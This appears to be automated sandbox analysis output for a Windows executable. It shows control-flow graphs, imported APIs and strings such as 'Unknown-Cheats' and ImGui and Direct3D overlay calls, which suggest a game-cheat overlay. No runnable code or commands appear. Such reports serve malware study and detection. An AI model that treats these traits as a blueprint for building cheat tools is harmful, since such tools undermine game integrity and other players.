7ff69dcd74c2-7ff69dcd74c9 975->977 976->973 978 7ff69dcd74b5-7ff69dcd74bc 976->978 979 7ff69dcd74ee-7ff69dcd7534 977->979 980 7ff69dcd74cb-7ff69dcd74e8 call 7ff69dcd2fe0 977->980 978->973 978->977 982 7ff69dcd7561 979->982 983 7ff69dcd7536-7ff69dcd755f call 7ff69dcd6980 * 2 979->983 980->973 980->979 984 7ff69dcd7563-7ff69dcd7587 982->984 983->984 987 7ff69dcd767a 984->987 988 7ff69dcd758d-7ff69dcd7599 984->988 990 7ff69dcd7682-7ff69dcd7689 987->990 991 7ff69dcd759e-7ff69dcd75a8 988->991 992 7ff69dcd759b 988->992 994 7ff69dcd768f-7ff69dcd76cd 990->994 995 7ff69dcd79ea 990->995 996 7ff69dcd75b0-7ff69dcd7604 call 7ff69dd09540 991->996 997 7ff69dcd75aa-7ff69dcd75ae 991->997 992->991 999 7ff69dcd76d0-7ff69dcd76d8 994->999 1002 7ff69dcd79f3-7ff69dcd79fa 995->1002 1000 7ff69dcd7609-7ff69dcd7616 996->1000 997->1000 999->999 1003 7ff69dcd76da-7ff69dcd770e call 7ff69dcd4ce0 call 7ff69dcd85f0 999->1003 1005 7ff69dcd761b-7ff69dcd7678 call 7ff69dce3400 call 7ff69dd05a30 1000->1005 1006 7ff69dcd7618 1000->1006 1007 7ff69dcd7f95-7ff69dcd7f9c 1002->1007 1008 7ff69dcd7a00-7ff69dcd7af4 call 7ff69dcd39d0 call 7ff69dd1c9b0 call 7ff69dcd4820 1002->1008 1038 7ff69dcd7710-7ff69dcd7715 1003->1038 1039 7ff69dcd771a-7ff69dcd773e 1003->1039 1005->990 1006->1005 1009 7ff69dcd7fa2-7ff69dcd7fbc call 7ff69dce3400 1007->1009 1010 7ff69dcd80a7-7ff69dcd80ae 1007->1010 1046 7ff69dcd7afa-7ff69dcd7b17 call 7ff69dcd6c40 1008->1046 1047 7ff69dcd7be8-7ff69dcd7c10 1008->1047 1028 7ff69dcd7fc0-7ff69dcd809d call 7ff69dcd5a80 call 7ff69dcd5760 call 7ff69dcd5a80 call 7ff69dcd5760 call 7ff69dd04ef0 1009->1028 1010->973 1014 7ff69dcd80b4-7ff69dcd80bb 1010->1014 1020 7ff69dcd8180-7ff69dcd8192 1014->1020 1021 7ff69dcd80c1-7ff69dcd80c8 1014->1021 1030 7ff69dcd8194-7ff69dcd81f7 call 7ff69dcd8310 1020->1030 1031 7ff69dcd81fc-7ff69dcd8240 call 7ff69dcd8310 1020->1031 1026 7ff69dcd80ca-7ff69dcd8128 call 7ff69dce3400 call 7ff69dd05050 1021->1026 1027 7ff69dcd812d-7ff69dcd817b call 7ff69dce3400 call 7ff69dd05050 1021->1027 1026->1027 1027->973 1110 7ff69dcd80a3 1028->1110 1030->1031 1031->973 1038->1039 1045 7ff69dcd7740-7ff69dcd7748 1039->1045 1045->1045 1051 7ff69dcd774a-7ff69dcd7791 call 7ff69dcd4ce0 call 7ff69dcd87d0 * 2 1045->1051 1065 7ff69dcd7b97-7ff69dcd7b9f 1046->1065 1066 7ff69dcd7b19-7ff69dcd7b24 1046->1066 1052 7ff69dcd7dc3-7ff69dcd7ddf 1047->1052 1053 7ff69dcd7c16-7ff69dcd7c1d 1047->1053 1094 7ff69dcd7793-7ff69dcd77a4 1051->1094 1095 7ff69dcd77c5-7ff69dcd77d0 1051->1095 1061 7ff69dcd7de6-7ff69dcd7dee 1052->1061 1058 7ff69dcd7c23-7ff69dcd7d74 1053->1058 1059 7ff69dcd7d7a-7ff69dcd7d88 1053->1059 1058->1059 1064 7ff69dcd7d90-7ff69dcd7dc1 1059->1064 1061->1061 1067 7ff69dcd7df0-7ff69dcd7e0b call 7ff69dcd4ce0 1061->1067 1064->1052 1064->1064 1075 7ff69dcd7bd2-7ff69dcd7be3 1065->1075 1076 7ff69dcd7ba1-7ff69dcd7bb2 1065->1076 1071 7ff69dcd7b5a-7ff69dcd7b95 1066->1071 1072 7ff69dcd7b26-7ff69dcd7b3a 1066->1072 1091 7ff69dcd7e41-7ff69dcd7e56 1067->1091 1092 7ff69dcd7e0d-7ff69dcd7e21 1067->1092 1071->1065 1079 7ff69dcd7b55 call 7ff69dd1d1d4 1072->1079 1080 7ff69dcd7b3c-7ff69dcd7b4f 1072->1080 1078 7ff69dcd7e5d-7ff69dcd7e84 1075->1078 1083 7ff69dcd7bb4-7ff69dcd7bc7 1076->1083 1084 7ff69dcd7bcd call 7ff69dd1d1d4 1076->1084 1088 7ff69dcd7e8c-7ff69dcd7ee8 call 7ff69dd09540 1078->1088 1089 7ff69dcd7e86-7ff69dcd7e8a 1078->1089 1079->1071 1080->1079 1085 7ff69dcd82ee-7ff69dcd82f4 _invalid_parameter_noinfo_noreturn 1080->1085 1083->1084 1083->1085 1084->1075 1098 7ff69dcd82f5-7ff69dcd82fb _invalid_parameter_noinfo_noreturn 1085->1098 1096 7ff69dcd7eef-7ff69dcd7f5f call 7ff69dce3400 call 7ff69dd05a30 1088->1096 1089->1096 1091->1078 1099 7ff69dcd7e23-7ff69dcd7e36 1092->1099 1100 7ff69dcd7e3c call 7ff69dd1d1d4 1092->1100 1103 7ff69dcd77bf-7ff69dcd77c4 call 7ff69dd1d1d4 1094->1103 1104 7ff69dcd77a6-7ff69dcd77b9 1094->1104 1107 7ff69dcd77d2-7ff69dcd77e6 1095->1107 1108 7ff69dcd7807-7ff69dcd7812 1095->1108 1096->1007 1139 7ff69dcd7f61-7ff69dcd7f75 1096->1139 1109 7ff69dcd82fc-7ff69dcd8302 _invalid_parameter_noinfo_noreturn 1098->1109 1099->1098 1099->1100 1100->1091 1103->1095 1104->1103 1111 7ff69dcd82cb-7ff69dcd82d1 _invalid_parameter_noinfo_noreturn 1104->1111 1114 7ff69dcd7801-7ff69dcd7806 call 7ff69dd1d1d4 1107->1114 1115 7ff69dcd77e8-7ff69dcd77fb 1107->1115 1116 7ff69dcd7814-7ff69dcd7828 1108->1116 1117 7ff69dcd7849-7ff69dcd7851 1108->1117 1110->1010 1123 7ff69dcd82d2-7ff69dcd82d8 _invalid_parameter_noinfo_noreturn 1111->1123 1114->1108 1115->1114 1115->1123 1118 7ff69dcd7843-7ff69dcd7848 call 7ff69dd1d1d4 1116->1118 1119 7ff69dcd782a-7ff69dcd783d 1116->1119 1120 7ff69dcd7853-7ff69dcd7864 1117->1120 1121 7ff69dcd7884-7ff69dcd78ab 1117->1121 1118->1117 1119->1118 1126 7ff69dcd82d9-7ff69dcd82df _invalid_parameter_noinfo_noreturn 1119->1126 1128 7ff69dcd787f call 7ff69dd1d1d4 1120->1128 1129 7ff69dcd7866-7ff69dcd7879 1120->1129 1130 7ff69dcd78b3-7ff69dcd790f call 7ff69dd09540 1121->1130 1131 7ff69dcd78ad-7ff69dcd78b1 1121->1131 1123->1126 1135 7ff69dcd82e0-7ff69dcd82e6 _invalid_parameter_noinfo_noreturn 1126->1135 1128->1121 1129->1128 1129->1135 1137 7ff69dcd7916-7ff69dcd791d 1130->1137 1131->1137 1140 7ff69dcd82e7-7ff69dcd82ed _invalid_parameter_noinfo_noreturn 1135->1140 1144 7ff69dcd791f-7ff69dcd7927 1137->1144 1145 7ff69dcd7929 1137->1145 1142 7ff69dcd7f90 call 7ff69dd1d1d4 1139->1142 1143 7ff69dcd7f77-7ff69dcd7f8a 1139->1143 1140->1085 1142->1007 1143->1109 1143->1142 1146 7ff69dcd792d-7ff69dcd79b2 call 7ff69dce3400 call 7ff69dd05a30 1144->1146 1145->1146 1146->1002 1152 7ff69dcd79b4-7ff69dcd79c8 1146->1152 1153 7ff69dcd79e3-7ff69dcd79e8 call 7ff69dd1d1d4 1152->1153 1154 7ff69dcd79ca-7ff69dcd79dd 1152->1154 1153->1002 1154->1140 1154->1153
                  APIs
                    • Part of subcall function 00007FF69DCE6490: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00007FF69DCD70E5), ref: 00007FF69DCE64D0
                    • Part of subcall function 00007FF69DCE6490: memset.VCRUNTIME140(?,?,00007FF69DCD70E5), ref: 00007FF69DCE652C
                  • powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD73AA
                  • powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD73C6
                  • powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD73E0
                  • sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD7401
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82CB
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82D2
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82D9
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82E0
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82E7
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82EE
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82F5
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82FC
                    • Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD57FC
                    • Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5808
                    • Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5819
                    • Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD582D
                    • Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD583A
                    • Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5847
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: _invalid_parameter_noinfo_noreturn$cosfpowfsinf$mallocmemsetsqrtf
                  • String ID: ##Background$2$2$[$m
                  • API String ID: 3051723971-1492082648
                  • Opcode ID: a87d0b9bf0189bafa05fb9ae492a2cba66d9191b607d643dc410bafdebdd9171
                  • Instruction ID: ed3cecee9341dfe3da221541d4d26791d76dcc7b9b8c4e41284f487e860910ab
                  • Opcode Fuzzy Hash: a87d0b9bf0189bafa05fb9ae492a2cba66d9191b607d643dc410bafdebdd9171
                  • Instruction Fuzzy Hash: 07B2A522D18BC589E732CF35D8413F96364FF5A398F049372EA8DA6695EF38A185C740

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1157 7ff69dcdb15e-7ff69dcdb161 1158 7ff69dcdb455-7ff69dcdb481 1157->1158 1159 7ff69dcdb167-7ff69dcdb16a 1157->1159 1160 7ff69dcdb483-7ff69dcdb496 call 7ff69dcf19e0 1158->1160 1161 7ff69dcdb49d-7ff69dcdb4eb 1158->1161 1162 7ff69dcde9a0-7ff69dcdea33 call 7ff69dce9850 call 7ff69dcee4d0 call 7ff69dceed50 call 7ff69dd1cf30 1159->1162 1163 7ff69dcdb170-7ff69dcdb193 1159->1163 1160->1161 1164 7ff69dcdb5a3-7ff69dcdb5bb call 7ff69dd0e260 1161->1164 1165 7ff69dcdb4f1-7ff69dcdb4f7 1161->1165 1168 7ff69dcdb1b3-7ff69dcdb298 call 7ff69dd0e260 1163->1168 1169 7ff69dcdb195-7ff69dcdb1ac call 7ff69dcf19e0 1163->1169 1184 7ff69dcdb5c1-7ff69dcdb634 call 7ff69dd0e260 1164->1184 1185 7ff69dcdb6e7-7ff69dcdb7d4 call 7ff69dd0e260 1164->1185 1171 7ff69dcdb55d-7ff69dcdb566 1165->1171 1172 7ff69dcdb4f9-7ff69dcdb55b 1165->1172 1182 7ff69dcdb29e-7ff69dcdb3e0 1168->1182 1183 7ff69dcdb3e7-7ff69dcdb3f5 1168->1183 1169->1168 1178 7ff69dcdb570-7ff69dcdb5a1 1171->1178 1172->1164 1178->1164 1178->1178 1182->1183 1188 7ff69dcdb400-7ff69dcdb42e 1183->1188 1198 7ff69dcdb644-7ff69dcdb6d7 call 7ff69dd0e260 1184->1198 1199 7ff69dcdb636-7ff69dcdb63d 1184->1199 1195 7ff69dcdb7d6-7ff69dcdb803 1185->1195 1196 7ff69dcdb808-7ff69dcdb904 call 7ff69dd0e260 * 2 1185->1196 1188->1188 1192 7ff69dcdb430-7ff69dcdb443 call 7ff69dd0e260 1188->1192 1192->1162 1206 7ff69dcdb449-7ff69dcdb450 1192->1206 1195->1196 1211 7ff69dcdbaa3-7ff69dcdbb19 call 7ff69dd0e260 1196->1211 1212 7ff69dcdb90a-7ff69dcdb910 1196->1212 1198->1185 1209 7ff69dcdb6d9-7ff69dcdb6e0 1198->1209 1199->1198 1206->1162 1209->1185 1218 7ff69dcdbb1f-7ff69dcdbc65 1211->1218 1219 7ff69dcdbc6b-7ff69dcdbc76 1211->1219 1214 7ff69dcdba5e-7ff69dcdba67 1212->1214 1215 7ff69dcdb916-7ff69dcdba5c 1212->1215 1217 7ff69dcdba70-7ff69dcdba72 1214->1217 1215->1211 1220 7ff69dcdba75-7ff69dcdba92 1217->1220 1221 7ff69dcdba94-7ff69dcdbaa1 1217->1221 1218->1219 1222 7ff69dcdbc80-7ff69dcdbcb2 1219->1222 1220->1221 1221->1211 1221->1217 1222->1222 1223 7ff69dcdbcb4-7ff69dcdbd2c call 7ff69dd0e260 1222->1223 1226 7ff69dcdbd32-7ff69dcdbd38 1223->1226 1227 7ff69dcdbed4-7ff69dcdbf08 call 7ff69dd0e260 1223->1227 1228 7ff69dcdbd3e-7ff69dcdbe84 1226->1228 1229 7ff69dcdbe8a-7ff69dcdbe95 1226->1229 1233 7ff69dcdbf24-7ff69dcdbf40 1227->1233 1234 7ff69dcdbf0a-7ff69dcdbf1d call 7ff69dcf19e0 1227->1234 1228->1229 1231 7ff69dcdbea0-7ff69dcdbed2 1229->1231 1231->1227 1231->1231 1236 7ff69dcdbf42-7ff69dcdbf55 call 7ff69dcf19e0 1233->1236 1237 7ff69dcdbf5c-7ff69dcdbfbc 1233->1237 1234->1233 1236->1237 1240 7ff69dcdbfc2-7ff69dcdbfc8 1237->1240 1241 7ff69dcdc164-7ff69dcdc1b7 call 7ff69dd10650 1237->1241 1243 7ff69dcdbfce-7ff69dcdc114 1240->1243 1244 7ff69dcdc11a-7ff69dcdc125 1240->1244 1248 7ff69dcdc1d3-7ff69dcdc231 1241->1248 1249 7ff69dcdc1b9-7ff69dcdc1cc call 7ff69dcf19e0 1241->1249 1243->1244 1246 7ff69dcdc130-7ff69dcdc162 1244->1246 1246->1241 1246->1246 1250 7ff69dcdc3fd 1248->1250 1251 7ff69dcdc237-7ff69dcdc3fb 1248->1251 1249->1248 1254 7ff69dcdc406-7ff69dcdc40e 1250->1254 1251->1254 1255 7ff69dcdc411-7ff69dcdc443 1254->1255 1255->1255 1256 7ff69dcdc445-7ff69dcdc4a6 call 7ff69dd10650 1255->1256 1259 7ff69dcdc4ac call 7ff69dcfa440 1256->1259 1260 7ff69dcdc4b1-7ff69dcdc51f 1259->1260 1261 7ff69dcdc525-7ff69dcdc52b 1260->1261 1262 7ff69dcdc6c4-7ff69dcdc6f5 call 7ff69dd0c8b0 call 7ff69dcf1d00 1260->1262 1264 7ff69dcdc531-7ff69dcdc677 1261->1264 1265 7ff69dcdc67d-7ff69dcdc688 1261->1265 1270 7ff69dcdc903-7ff69dcdc971 call 7ff69dd17040 1262->1270 1271 7ff69dcdc6fb-7ff69dcdc701 1262->1271 1264->1265 1267 7ff69dcdc690-7ff69dcdc6c2 1265->1267 1267->1262 1267->1267 1279 7ff69dcdcb73-7ff69dcdcba8 call 7ff69dd0c8b0 call 7ff69dcf1d00 1270->1279 1280 7ff69dcdc977-7ff69dcdc97d 1270->1280 1272 7ff69dcdc8be-7ff69dcdc8c7 1271->1272 1273 7ff69dcdc707-7ff69dcdc8bc 1271->1273 1275 7ff69dcdc8d0-7ff69dcdc8d2 1272->1275 1273->1270 1277 7ff69dcdc8d5-7ff69dcdc8f2 1275->1277 1278 7ff69dcdc8f4-7ff69dcdc901 1275->1278 1277->1278 1278->1270 1278->1275 1288 7ff69dcdcbae-7ff69dcdcbb1 1279->1288 1289 7ff69dcdcdb0-7ff69dcdcdd1 call 7ff69dd17040 call 7ff69dce3a20 1279->1289 1282 7ff69dcdc983-7ff69dcdcb38 1280->1282 1283 7ff69dcdcb3a-7ff69dcdcb3f 1280->1283 1282->1279 1284 7ff69dcdcb40-7ff69dcdcb71 1283->1284 1284->1279 1284->1284 1290 7ff69dcdcd70-7ff69dcdcd7a 1288->1290 1291 7ff69dcdcbb7-7ff69dcdcd69 1288->1291 1289->1162 1293 7ff69dcdcd80-7ff69dcdcdae 1290->1293 1291->1290 1293->1289 1293->1293
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2$2$2$2$3$3$4$4$5$6$6$7$8$9$:$D$GaJZV6$IUU<$KUTZ=$RT^ON>$s]K4$v$zUWSO>
                  • API String ID: 0-4245946708
                  • Opcode ID: 41858d828e37d7783ae0d760bfe0a44044966b9d9a53e7b995b3dd3d927a7f9d
                  • Instruction ID: 88b3744e15a93315e2302f6c0e6d3a0495dd5153eff14a7801a2ffe1054e8c7b
                  • Opcode Fuzzy Hash: 41858d828e37d7783ae0d760bfe0a44044966b9d9a53e7b995b3dd3d927a7f9d
                  • Instruction Fuzzy Hash: E6E2E127D29BC24AE313D63590021A5EB64EFA73C4F55D373F68472A93FF69A1828704

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1297 7ff69dcd9820-7ff69dcd991e LoadIconW LoadCursorW LoadIconW RegisterClassExA CreateWindowExA 1298 7ff69dcd9ff5 1297->1298 1299 7ff69dcd9924-7ff69dcd9a7a SetWindowLongW DwmExtendFrameIntoClientArea ShowWindow SetWindowPos SetLayeredWindowAttributes UpdateWindow D3D11CreateDeviceAndSwapChain 1297->1299 1301 7ff69dcd9ff7-7ff69dcda024 call 7ff69dd1cf30 1298->1301 1299->1298 1300 7ff69dcd9a80-7ff69dcd9a9c 1299->1300 1300->1298 1305 7ff69dcd9aa2-7ff69dcd9acb 1300->1305 1305->1298 1308 7ff69dcd9ad1-7ff69dcd9adb 1305->1308 1309 7ff69dcd9ae3-7ff69dcd9b02 malloc 1308->1309 1310 7ff69dcd9add 1308->1310 1311 7ff69dcd9b04-7ff69dcd9b0e call 7ff69dce1670 1309->1311 1312 7ff69dcd9b10 1309->1312 1310->1309 1313 7ff69dcd9b13-7ff69dcd9b22 call 7ff69dce5320 1311->1313 1312->1313 1318 7ff69dcd9b24-7ff69dcd9b2b 1313->1318 1319 7ff69dcd9b2d 1313->1319 1320 7ff69dcd9b34-7ff69dcd9b7b 1318->1320 1319->1320 1321 7ff69dcd9cee-7ff69dcd9d39 call 7ff69dd06980 1320->1321 1322 7ff69dcd9b81-7ff69dcd9b87 1320->1322 1328 7ff69dcd9d3f-7ff69dcd9d45 1321->1328 1329 7ff69dcd9eae-7ff69dcd9ed9 call 7ff69dd06980 call 7ff69dce0710 1321->1329 1323 7ff69dcd9b8d-7ff69dcd9bbb 1322->1323 1324 7ff69dcd9cac-7ff69dcd9ccb 1322->1324 1326 7ff69dcd9bc0-7ff69dcd9ca1 1323->1326 1324->1321 1326->1326 1330 7ff69dcd9ca7-7ff69dcd9caa 1326->1330 1331 7ff69dcd9d4b-7ff69dcd9d79 1328->1331 1332 7ff69dcd9e6c-7ff69dcd9e77 1328->1332 1329->1298 1340 7ff69dcd9edf-7ff69dcd9ef7 1329->1340 1330->1321 1330->1324 1334 7ff69dcd9d80-7ff69dcd9e61 1331->1334 1335 7ff69dcd9e80-7ff69dcd9eac 1332->1335 1334->1334 1337 7ff69dcd9e67-7ff69dcd9e6a 1334->1337 1335->1329 1335->1335 1337->1329 1337->1332 1341 7ff69dcd9eff-7ff69dcd9f10 malloc 1340->1341 1342 7ff69dcd9ef9 1340->1342 1343 7ff69dcd9f12-7ff69dcd9f3e 1341->1343 1344 7ff69dcd9f40 1341->1344 1342->1341 1345 7ff69dcd9f43-7ff69dcd9f7d 1343->1345 1344->1345 1347 7ff69dcd9f7f-7ff69dcd9f96 1345->1347 1348 7ff69dcd9fc0-7ff69dcd9fc7 1345->1348 1347->1348 1354 7ff69dcd9f98-7ff69dcd9faf 1347->1354 1349 7ff69dcd9fcf-7ff69dcd9fd6 1348->1349 1350 7ff69dcd9fc9 1348->1350 1352 7ff69dcd9fde-7ff69dcd9ff3 1349->1352 1353 7ff69dcd9fd8 1349->1353 1350->1349 1352->1301 1353->1352 1354->1348 1358 7ff69dcd9fb1-7ff69dcd9fbc 1354->1358 1358->1348
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Window$Load$CreateIcon$AreaAttributesChainClassClientCursorDeviceExtendFrameIntoLayeredLongRegisterShowSwapUpdatemalloc
                  • String ID: +d?8+N$Unknown-Cheats$imgui_impl_dx11
                  • API String ID: 2038109671-1161604074
                  • Opcode ID: 6c79a2e9a0e70d6650a9c622e0d0ccfc5eca2b6ed4db2ebdd9c37acade1501ff
                  • Instruction ID: d8825660ecde3576ddc4c1eaca67a0daed98b2d76e35a1bdbfdd9d06d33e7083
                  • Opcode Fuzzy Hash: 6c79a2e9a0e70d6650a9c622e0d0ccfc5eca2b6ed4db2ebdd9c37acade1501ff
                  • Instruction Fuzzy Hash: 0222C736E19B4286E7218F35D8402A8B774FF95788F509376EE8C63A64EF39E185C340
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$333?$Debug##Default$HoveredId: 0x%08X$Left$Middle$NewFrame(): ClearActiveID() because it isn't marked alive anymore!$Press ESC to abort picking.$Remap w/ Ctrl+Shift: click anywhere to select new mouse button.$Right
                  • API String ID: 0-1443573127
                  • Opcode ID: a906df770f7fbc8baeb6c1ff89d1424eeb69913d6a7b629fe57713e86be37dbd
                  • Instruction ID: daa906dec397c6b6aad8858b48627a396c26f76198f0b1333848d46a674db7b9
                  • Opcode Fuzzy Hash: a906df770f7fbc8baeb6c1ff89d1424eeb69913d6a7b629fe57713e86be37dbd
                  • Instruction Fuzzy Hash: 9362E376A086C2D6EB298F35D5452B877B8FF44B44F084176CB9D872C0EF38A956C760
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free
                  • String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$333?$Debug##Default$HoveredId: 0x%08X$Left$Middle$Press ESC to abort picking.$Remap w/ Ctrl+Shift: click anywhere to select new mouse button.$Right
                  • API String ID: 1294909896-3186328394
                  • Opcode ID: c1e9fce559825455957a629ca0dc53841025109da5d8e432507ec163778051df
                  • Instruction ID: 0a8f3aebe4c1a8834f2fdb0388cce8f8d1b4a34e7c3b09ce29164d32bad9504d
                  • Opcode Fuzzy Hash: c1e9fce559825455957a629ca0dc53841025109da5d8e432507ec163778051df
                  • Instruction Fuzzy Hash: 2732D3B6A086C2C6EB359F34D4452B937B8FF44B44F084276DB8D87285EF38A9568760

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2197 7ff69dce0710-7ff69dce0740 QueryPerformanceFrequency 2198 7ff69dce089e 2197->2198 2199 7ff69dce0746-7ff69dce0753 QueryPerformanceCounter 2197->2199 2201 7ff69dce08a0-7ff69dce08ba call 7ff69dd1cf30 2198->2201 2199->2198 2200 7ff69dce0759-7ff69dce0773 2199->2200 2202 7ff69dce0775 2200->2202 2203 7ff69dce077b-7ff69dce078e malloc 2200->2203 2202->2203 2206 7ff69dce0790-7ff69dce07a8 2203->2206 2207 7ff69dce07aa 2203->2207 2208 7ff69dce07ad-7ff69dce0837 2206->2208 2207->2208 2209 7ff69dce0840-7ff69dce0851 LoadLibraryA 2208->2209 2210 7ff69dce0853-7ff69dce085a 2209->2210 2211 7ff69dce085e-7ff69dce0886 GetProcAddress * 2 2209->2211 2210->2209 2212 7ff69dce085c 2210->2212 2213 7ff69dce088a-7ff69dce089c 2211->2213 2212->2213 2213->2201
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: AddressPerformanceProcQuery$CounterFrequencyLibraryLoadmalloc
